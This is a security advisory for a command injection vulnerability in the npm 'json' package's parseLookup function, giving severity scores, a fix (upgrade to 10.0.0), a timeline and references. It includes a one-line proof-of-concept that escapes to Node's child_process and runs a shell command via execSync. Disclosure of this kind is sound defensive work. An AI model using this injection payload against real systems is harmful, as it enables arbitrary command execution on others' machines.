SNYK-JS-JSON-597481

SNYK-JS-JSON-597481 PUBLISHED CVSS 7.199999809265137 HIGH

## Overview [json](https://www.npmjs.com/package/json) is a 'json' command tool for massaging and processing JSON on the command line. Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbritary commands using the `parseLookup` function. ### PoC ``` const json = require('json'); res = json.parseLookup('{[this.constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()]}'); console.log(res); ``` ## Remediation Upgrade `json` to version 10.0.0 or higher. ## References - [GitHub Issue](https://github.com/trentm/json/issues/144) - [GitHub PR](https://github.com/trentm/json/pull/145)

Risk Scores

CVSS 3.1

7.199999809265137

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P

Affected Products

Vendor	Product	Versions
		0

Exploit Intelligence

owasp-exclude.xml (github-poc)
suppressions.xml (github-poc)

Timeline

Aug 6, 2020 CVE Updated
Aug 30, 2020 CVE Published

References

https://security.snyk.io/vuln/SNYK-JS-JSON-597481 advisory
https://learn.snyk.io/lesson/malicious-code-injection/ technical
https://www.npmjs.com/package/json vendor
https://github.com/trentm/json/issues/144 issue
https://github.com/trentm/json/pull/145 patch

Open in Interactive Console →